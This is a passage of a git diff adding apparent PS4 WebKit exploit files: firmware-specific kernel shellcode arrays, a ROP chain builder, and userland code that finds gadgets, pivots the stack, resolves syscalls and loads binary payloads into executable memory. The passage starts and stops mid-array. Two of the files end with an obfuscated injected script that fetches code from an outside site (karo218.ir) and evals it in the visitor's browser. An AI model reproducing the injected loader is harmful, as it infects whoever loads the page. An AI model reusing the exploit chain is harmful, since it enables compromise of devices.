0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA === 4.70) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x47C02494, 0x8D4DFFCF, 0xCDF024B4, 0x8D4D000E, 0xC6F024AC, 0x8149FFD0, 0x660500C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA >= 4.71 && fwFromUA <= 4.74) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x48302494, 0x8D4DFFCF, 0xCDF024B4, 0x8D4D000E, 0xC76024AC, 0x8149FFD0, 0x660570C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA >= 5.00 && fwFromUA <= 5.01) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xDF8024B4, 0x8D4D0010, 0x5AB024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA === 5.03) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xE09024B4, 0x8D4D0010, 0x5E4024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA >= 5.05 && fwFromUA <= 5.07) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xE09024B4, 0x8D4D0010, 0x5E8024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/rop.js b/505/rop.js new file mode 100644 index 00000000..1acac72c --- /dev/null +++ b/505/rop.js @@ -0,0 +1,132 @@ +window.memory = function (address) { + this.basePtr = address; + this.dataPtr = 0; + + this.allocate = function (size) { + if (this.dataPtr > 0x10000 || this.dataPtr + size > 0x10000) { + return -1; + } + + var memAddr = this.basePtr.add32(this.dataPtr); + + this.dataPtr += size; + + return memAddr; + }; + + this.clear = function () { + for (var i = 0; i < 0x10000; i += 8) { + p.write8(this.basePtr.add32(i), 0); + } + }; + + this.clear(); + + return this; +}; + +window.kropchain = function (addr) { + this.stackBase = addr; + this.count = 0; + + this.push = function (val) { + p.write8(this.stackBase.add32(this.count * 8), val); + this.count++; + }; + + this.write64 = function (address, value) { + this.push(gadgets['pop rdi']); + this.push(address); + this.push(gadgets['pop rax']); + this.push(value); + this.push(gadgets['mov [rdi], rax']); + }; + + return this; +}; + +window.rop = function () { + this.stack = new Uint32Array(0x4000); + this.stackBase = p.read8(p.leakval(this.stack).add32(leakval_slide)); + this.count = 0; + + this.clear = function () { + this.count = 0; + this.runtime = undefined; + + for (var i = 0; i < 0xFF0 / 2; i++) { + p.write8(this.stackBase.add32(i * 8), 0); + } + }; + + this.pushSymbolic = function () { + this.count++; + return this.count - 1; + }; + + this.finalizeSymbolic = function (idx, val) { + p.write8(this.stackBase.add32(idx * 8), val); + }; + + this.push = function (val) { + this.finalizeSymbolic(this.pushSymbolic(), val); + }; + + this.push_write8 = function (where, what) { + this.push(gadgets['pop rdi']); + this.push(where); + this.push(gadgets['pop rsi']); + this.push(what); + this.push(gadgets['mov [rdi], rsi']); + }; + + this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9) { + if (rdi !== undefined) { + this.push(gadgets['pop rdi']); + this.push(rdi); + } + + if (rsi !== undefined) { + this.push(gadgets['pop rsi']); + this.push(rsi); + } + + if (rdx !== undefined) { + this.push(gadgets['pop rdx']); + this.push(rdx); + } + + if (rcx !== undefined) { + this.push(gadgets['pop rcx']); + this.push(rcx); + } + + if (r8 !== undefined) { + this.push(gadgets['pop r8']); + this.push(r8); + } + + if (r9 !== undefined) { + this.push(gadgets['pop r9']); + this.push(r9); + } + + this.push(rip); + return this; + }; + + this.saveReturnValue = function (where) { + this.push(gadgets['pop rdi']); + this.push(where); + this.push(gadgets['mov [rdi], rax']); + }; + + this.run = function () { + var retv = p.loadchain(this, this.notimes); + this.clear(); + return retv; + }; + + return this; +}; +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/userland.js b/505/userland.js new file mode 100644 index 00000000..012d3080 --- /dev/null +++ b/505/userland.js @@ -0,0 +1,636 @@ +var nogc = []; + +var gadgets; +var syscalls = {}; + +var gadgetmap_wk = { + 'ep': [0x5B, 0x41, 0x5C, 0x41, 0x5D, 0x41, 0x5E, 0x41, 0x5F, 0x5D, 0xC3], + 'pop rsi': [0x5E, 0xC3], + 'pop rdi': [0x5F, 0xC3], + 'pop rsp': [0x5C, 0xC3], + 'pop rax': [0x58, 0xC3], + 'pop rdx': [0x5A, 0xC3], + 'pop rcx': [0x59, 0xC3], + 'pop rbp': [0x5D, 0xC3], + 'pop r8': [0x47, 0x58, 0xC3], + 'pop r9': [0x47, 0x59, 0xC3], + 'infloop': [0xEB, 0xFE, 0xC3], + 'ret': [0xC3], + 'mov [rdi], rsi': [0x48, 0x89, 0x37, 0xC3], + 'mov [rdi], rax': [0x48, 0x89, 0x07, 0xC3], + 'mov rax, rdi': [0x48, 0x89, 0xF8, 0xC3], +}; + +var slowpath_jop = [0x48, 0x8B, 0x7F, 0x48, 0x48, 0x8B, 0x07, 0x48, 0x8B, 0x40, 0x30, 0xFF, 0xE0]; +slowpath_jop.reverse(); + +var get_jmptgt = function (addr) { + var z = p.read4(addr) & 0xFFFF; + var y = p.read4(addr.add32(2)); + if (z != 0x25FF) { + return 0; + } + return addr.add32(y + 6); +}; + +function userland() { + var slide = 0x40; + if (fwFromUA <= 4.07) { + slide = 0x20; + } + + p.leakfunc = function (func) { + var fptr_store = p.leakval(func); + return (p.read8(fptr_store.add32(0x18))).add32(slide); + }; + + var parseFloatStore = p.leakfunc(parseFloat); + var parseFloatPtr = p.read8(parseFloatStore); + + var webKitBase = parseFloatPtr; + webKitBase.sub32inplace(parseFloat_offset); + window.webKitBase = webKitBase; + + var o2wk = function (o) { + return webKitBase.add32(o); + }; + window.o2wk = o2wk; + + var gadgets_temp = { + '__stack_chk_fail': o2wk(gadget_offsets['__stack_chk_fail']), + '__stack_chk_fail_offset': gadget_offsets['__stack_chk_fail_offset'], + 'memset': o2wk(gadget_offsets['memset']), + 'memset_offset': gadget_offsets['memset_offset'], + }; + + var libSceLibcInternalBase = p.read8(get_jmptgt(gadgets_temp['memset'])); + libSceLibcInternalBase.sub32inplace(gadgets_temp['memset_offset']); + window.libSceLibcInternalBase = libSceLibcInternalBase; + + var o2lc = function (o) { + return libSceLibcInternalBase.add32(o); + }; + window.o2lc = o2lc; + + var libKernelBase = p.read8(get_jmptgt(gadgets_temp['__stack_chk_fail'])); + libKernelBase.sub32inplace(gadgets_temp['__stack_chk_fail_offset']); + window.libKernelBase = libKernelBase; + + var o2lk = function (o) { + return libKernelBase.add32(o); + }; + window.o2lk = o2lk; + + gadgets = { + '__stack_chk_fail': o2wk(gadget_offsets['__stack_chk_fail']), + '__stack_chk_fail_offset': gadget_offsets['__stack_chk_fail_offset'], + 'memcpy': o2wk(gadget_offsets['memcpy']), + 'memset': o2wk(gadget_offsets['memset']), + 'memset_offset': gadget_offsets['memset_offset'], + 'setjmp': o2wk(gadget_offsets['setjmp']), + 'scePthreadCreate': o2lk(gadget_offsets['scePthreadCreate']), + 'mov rdi, [rdi+0x48]': o2lc(gadget_offsets['mov rdi, [rdi+0x48]']), + 'sub rax, rcx': o2lk(gadget_offsets['sub rax, rcx']), + 'add rax, [rdi]': o2lc(gadget_offsets['add rax, [rdi]']), + }; + + var wkview = new Uint8Array(0x1000); + var wkstr = p.leakval(wkview).add32(leakval_slide); + + p.write8(wkstr, webKitBase); + p.write4(wkstr.add32(8), 0x3052D38); + + var gadgets_to_find = 0; + var gadgetnames = []; + for (var gadgetname in gadgetmap_wk) { + if (gadgetmap_wk.hasOwnProperty(gadgetname)) { + gadgets_to_find++; + gadgetnames.push(gadgetname); + gadgetmap_wk[gadgetname].reverse(); + } + } + + gadgets_to_find++; + + var findgadget = function (donecb) { + if (gadget_cache) { + gadgets_to_find = 0; + slowpath_jop = 0; + for (var gadgetname in gadget_cache) { + if (gadget_cache.hasOwnProperty(gadgetname)) { + gadgets[gadgetname] = o2wk(gadget_cache[gadgetname]); + } + } + } else { + for (var i = 0; i < wkview.length; i++) { + if (wkview[i] == 0xc3) { + for (var nl = 0; nl < gadgetnames.length; nl++) { + var found = 1; + if (!gadgetnames[nl]) { + continue; + } + var gadgetbytes = gadgetmap_wk[gadgetnames[nl]]; + for (var compareidx = 0; compareidx < gadgetbytes.length; compareidx++) { + if (gadgetbytes[compareidx] != wkview[i - compareidx]) { + found = 0; + break; + } + } + if (!found) { + continue; + } + gadgets[gadgetnames[nl]] = o2wk(i - gadgetbytes.length + 1); + gadgetoffs[gadgetnames[nl]] = i - gadgetbytes.length + 1; + delete gadgetnames[nl]; + gadgets_to_find--; + } + } else if (wkview[i] == 0xe0 && wkview[i - 1] == 0xff && slowpath_jop) { + var found = 1; + for (var compareidx = 0; compareidx < slowpath_jop.length; compareidx++) { + if (slowpath_jop[compareidx] != wkview[i - compareidx]) { + found = 0; + break; + } + } + if (!found) { + continue; + } + gadgets['jop'] = o2wk(i - slowpath_jop.length + 1); + gadgetoffs['jop'] = i - slowpath_jop.length + 1; + gadgets_to_find--; + slowpath_jop = 0; + } + if (!gadgets_to_find) { + break; + } + } + } + if (!gadgets_to_find && !slowpath_jop) { + setTimeout(donecb, 50); + } else { + /* Only needed for debugging + print('missing gadgets: '); + for (var nl in gadgetnames) { + print(' - ' + gadgetnames[nl]); + } + if (slowpath_jop) { + print(' - jop gadget'); + } + */ + } + }; + + findgadget(function () { }); + + if (fwFromUA <= 4.07) { + var funcPtrStore = p.leakfunc(parseFloat); + var funcArgs = []; + + for (var i = 0; i < 0x7FFF; i++) { + funcArgs[i] = 0x41410000 | i; + } + + var argBuffer = new Uint32Array(0x1000); + var argPointer = p.read8(p.leakval(argBuffer).add32(leakval_slide)); + argBuffer[0] = 0x13371337; + + if (p.read4(argPointer) != 0x13371337) { + throw new Error('Stack frame is not aligned!'); + } + + window.dont_tread_on_me = [argBuffer]; + + var launch_chain = function (chain) { + var stackPointer = 0; + var stackCookie = 0; + var orig_reenter_rip = 0; + + var reenter_help = { + length: { + valueOf: function () { + orig_reenter_rip = p.read8(stackPointer); + stackCookie = p.read8(stackPointer.add32(8)); + var returnToFrame = stackPointer; + + var ocnt = chain.count; + chain.push_write8(stackPointer, orig_reenter_rip); + chain.push_write8(stackPointer.add32(8), stackCookie); + + if (chain.runtime) { + returnToFrame = chain.runtime(stackPointer); + } + + chain.push(gadgets['pop rsp']); + chain.push(returnToFrame); + chain.count = ocnt; + + p.write8(stackPointer, gadgets['pop rsp']); + p.write8(stackPointer.add32(8), chain.stackBase); + }, + }, + }; + + return (function () { + (function () {}).apply(null, funcArgs); + + var orig = p.read8(funcPtrStore); + p.write8(funcPtrStore, gadgets['mov rax, rdi']); + + var trap = p.leakval(parseFloat()); + var rtv = 0; + var fakeval = new int64(0x41414141, 0xFFFF0000); + + (function () { + var val = p.read8(trap.add32(0x100)); + if ((val.hi != 0xFFFF0000) || ((val.low & 0xFFFF0000) != 0x41410000)) { + throw new Error('Stack frame corrupted!'); + } + }).apply(null, funcArgs); + + p.write8(argPointer, argPointer.add32(0x100)); + p.write8(argPointer.add32(0x130), gadgets['setjmp']); + p.write8(funcPtrStore, gadgets['jop']); + + (function () {}).apply(null, funcArgs); + p.write8(trap.add32(0x18), argPointer); + p.leakval(parseFloat()); + + stackPointer = p.read8(argPointer.add32(0x10)); + + rtv = Array.prototype.splice.apply(reenter_help); + p.write8(trap.add32(0x18), fakeval); + p.write8(trap.add32(0x18), orig); + + return p.leakval(rtv); + }).apply(null, funcArgs); + }; + } else { + var hold1; + var hold2; + var holdz; + var holdz1; + + while (1) { + hold1 = { + a: 0, + b: 0, + c: 0, + d: 0, + }; + hold2 = { + a: 0, + b: 0, + c: 0, + d: 0, + }; + holdz1 = p.leakval(hold2); + holdz = p.leakval(hold1); + if (holdz.low - 0x30 == holdz1.low) { + break; + } + } + + var pushframe = []; + pushframe.length = 0x80; + var rtv = 0; + var funcbuf; + var funcbuf32 = new Uint32Array(0x100); + nogc.push(funcbuf32); + + var launch_chain = function (chain) { + var stackPointer = 0; + var stackCookie = 0; + var orig_reenter_rip = 0; + + var reenter_help = { + length: { + valueOf: function () { + orig_reenter_rip = p.read8(stackPointer); + stackCookie = p.read8(stackPointer.add32(8)); + var returnToFrame = stackPointer; + + var ocnt = chain.count; + chain.push_write8(stackPointer, orig_reenter_rip); + chain.push_write8(stackPointer.add32(8), stackCookie); + + if (chain.runtime) { + returnToFrame = chain.runtime(stackPointer); + } + + chain.push(gadgets['pop rsp']); + chain.push(returnToFrame); + chain.count = ocnt; + + p.write8(stackPointer, gadgets['pop rsp']); + p.write8(stackPointer.add32(8), chain.stackBase); + }, + }, + }; + + funcbuf = p.read8(p.leakval(funcbuf32).add32(leakval_slide)); + + p.write8(funcbuf.add32(0x30), gadgets['setjmp']); + p.write8(funcbuf.add32(0x80), gadgets['jop']); + p.write8(funcbuf, funcbuf); + p.write8(parseFloatStore, gadgets['jop']); + var orig_hold = p.read8(holdz1); + var orig_hold48 = p.read8(holdz1.add32(0x48)); + + p.write8(holdz1, funcbuf.add32(0x50)); + p.write8(holdz1.add32(0x48), funcbuf); + parseFloat(hold2, hold2, hold2, hold2, hold2, hold2); + p.write8(holdz1, orig_hold); + p.write8(holdz1.add32(0x48), orig_hold48); + + stackPointer = p.read8(funcbuf.add32(0x10)); + rtv = Array.prototype.splice.apply(reenter_help); + return p.leakval(rtv); + }; + } + + p.loadchain = launch_chain; + + if (fwFromUA <= 4.07) { + if (Object.keys(syscallMap).length != 0 && typeof syscallMap === 'object') { + syscalls = syscallMap; + for (var syscallno in syscalls) { + if (syscalls.hasOwnProperty(syscallno)) { + syscalls[syscallno] = o2lk(syscalls[syscallno]); + } + } + } else { + throw new Error('Unable to locate syscall map!'); + } + } else { + var kview = new Uint8Array(0x1000); + var kstr = p.leakval(kview).add32(leakval_slide); + + p.write8(kstr, libKernelBase); + p.write4(kstr.add32(8), 0x40000); + + var countbytes; + for (var i = 0; i < 0x40000; i++) { + if ( + kview[i] == 0x72 + && kview[i + 1] == 0x64 + && kview[i + 2] == 0x6C + && kview[i + 3] == 0x6F + && kview[i + 4] == 0x63 + ) { + countbytes = i; + break; + } + } + p.write4(kstr.add32(8), countbytes + 32); + + var dview32 = new Uint32Array(1); + var dview8 = new Uint8Array(dview32.buffer); + for (var i = 0; i < countbytes; i++) { + if ( + kview[i] == 0x48 + && kview[i + 1] == 0xC7 + && kview[i + 2] == 0xC0 + && kview[i + 7] == 0x49 + && kview[i + 8] == 0x89 + && kview[i + 9] == 0xCA + && kview[i + 10] == 0x0F + && kview[i + 11] == 0x05 + ) { + dview8[0] = kview[i + 3]; + dview8[1] = kview[i + 4]; + dview8[2] = kview[i + 5]; + dview8[3] = kview[i + 6]; + var syscallno = dview32[0]; + syscalls[syscallno] = libKernelBase.add32(i); + } + } + } + + var chain = new rop; + var returnvalue; + + p.fcall_ = function (rip, rdi, rsi, rdx, rcx, r8, r9) { + chain.clear(); + + chain.notimes = this.next_notime; + this.next_notime = 1; + + chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9); + + chain.push(gadgets['pop rdi']); + chain.push(chain.stackBase.add32(0x3FF8)); + chain.push(gadgets['mov [rdi], rax']); + + chain.push(gadgets['pop rax']); + chain.push(p.leakval(0x41414242)); + + if (chain.run().low != 0x41414242) { + throw new Error('Unexpected ROP behaviour'); + } + returnvalue = p.read8(chain.stackBase.add32(0x3FF8)); + }; + + p.fcall = function () { + var rv = p.fcall_.apply(this, arguments); + return returnvalue; + }; + + p.writestr = function (addr, str) { + for (var i = 0; i < str.length; i++) { + var byte_ = p.read4(addr.add32(i)); + byte_ &= 0xFFFF0000; + byte_ |= str.charCodeAt(i); + p.write4(addr.add32(i), byte_); + } + }; + + p.readstr = function (addr) { + var addr_ = addr.add32(0); + var rd = p.read4(addr_); + var buf = ''; + while (rd & 0xFF) { + buf += String.fromCharCode(rd & 0xFF); + addr_.add32inplace(1); + rd = p.read4(addr_); + } + return buf; + }; + + p.syscall = function (sysc, rdi, rsi, rdx, rcx, r8, r9) { + if (typeof sysc != 'number') { + throw new Error('Invalid syscall'); + } + + var off = syscalls[sysc]; + if (off == undefined) { + throw new Error('Undefined syscall number: ' + sysc); + } + + return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9); + }; + + p.stringify = function (str) { + var bufView = new Uint8Array(str.length + 1); + for (var i = 0; i < str.length; i++) { + bufView[i] = str.charCodeAt(i) & 0xFF; + } + nogc.push(bufView); + return p.read8(p.leakval(bufView).add32(leakval_slide)); + }; + + p.malloc = function malloc(sz) { + var backing = new Uint8Array(0x10000 + sz); + nogc.push(backing); + var ptr = p.read8(p.leakval(backing).add32(leakval_slide)); + ptr.backing = backing; + return ptr; + }; + + p.malloc32 = function malloc32(sz) { + var backing = new Uint8Array(0x10000 + sz * 4); + nogc.push(backing); + var ptr = p.read8(p.leakval(backing).add32(leakval_slide)); + ptr.backing = new Uint32Array(backing.buffer); + return ptr; + }; + + p.socket = function () { + return p.syscall(97, 2, 1, 0); // sys_socket + }; + + p.connectSocket = function (s, ip, port) { + var sockAddr = new Uint32Array(0x10); + var sockAddrPtr = p.read8(p.leakval(sockAddr).add32(leakval_slide)); + var ipSegments = ip.split('.'); + + for (var seg = 0; seg < 4; seg++) { + ipSegments[seg] = parseInt(ipSegments[seg]); + } + + sockAddr[0] |= (((port >> 8) & 0xFF) << 0x10 | port << 0x18) | 0x200; + sockAddr[1] = ipSegments[3] << 24 | ipSegments[2] << 16 | ipSegments[1] << 8 | ipSegments[0]; + sockAddr[2] = 0; + sockAddr[3] = 0; + + return p.syscall(98, s, sockAddrPtr, 0x10); // sys_connect + }; + + p.writeSocket = function (s, data, size) { + return p.syscall(4, s, data, size); // sys_write + }; + + p.closeSocket = function (s) { + return p.syscall(6, s); // sys_close + }; + + window.spawnthread = function (chain) { + var contextp = p.malloc32(0x1800); + var contextz = contextp.backing; + contextz[0] = 1337; + var thread2 = new rop(); + + thread2.push(gadgets['ret']); + thread2.push(gadgets['ret']); + thread2.push(gadgets['ret']); + thread2.push(gadgets['ret']); + chain(thread2); + p.write8(contextp, gadgets['ret']); + p.write8(contextp.add32(0x10), thread2.stackBase); + p.syscall(324, 1); + + var thread = p.malloc(0x08); + p.fcall(gadgets['scePthreadCreate'], thread, 0, gadgets['longjmp'], contextp, p.stringify('GottaGoFast')); + nogc.push(contextp); + nogc.push(thread2); + return thread2; + }; + + window.binLoader = function () { + var code_addr = new int64(0x26100000, 0x00000009); + var mapped_address = p.syscall(477, code_addr, 0x300000, 7, 0x41000, -1, 0); // sys_mmap + if (mapped_address == '926100000') { + try { + var loader_shcode = [0x31FE8948, 0x3D8B48C0, 0x00003FF4, 0xED0D8B48, 0x4800003F, 0xAAF3F929, 0xE8F78948, 0x00000060, 0x48C3C031, 0x0003C0C7, 0x89490000, 0xC3050FCA, 0x06C0C748, 0x49000000, 0x050FCA89, 0xC0C748C3, 0x0000001E, 0x0FCA8949, 0xC748C305, 0x000061C0, 0xCA894900, 0x48C3050F, 0x0068C0C7, 0x89490000, 0xC3050FCA, 0x6AC0C748, 0x49000000, 0x050FCA89, 0x909090C3, 0x90909090, 0x90909090, 0x90909090, 0xB8555441, 0x00003C23, 0xBED23153, 0x00000001, 0x000002BF, 0xEC834800, 0x2404C610, 0x2444C610, 0x44C70201, 0x00000424, 0x89660000, 0xC6022444, 0x00082444, 0x092444C6, 0x2444C600, 0x44C6000A, 0xC6000B24, 0x000C2444, 0x0D2444C6, 0xFF78E800, 0x10BAFFFF, 0x41000000, 0x8948C489, 0xE8C789E6, 0xFFFFFF73, 0x00000ABE, 0xE7894400, 0xFFFF73E8, 0x31D231FF, 0xE78944F6, 0xFFFF40E8, 0x48C589FF, 0x200000B8, 0x00000926, 0xC300C600, 0xEBC38948, 0x801F0F0C, 0x00000000, 0x01489848, 0x1000BAC3, 0x89480000, 0xE8EF89DE, 0xFFFFFEF7, 0xE87FC085, 0xE8E78944, 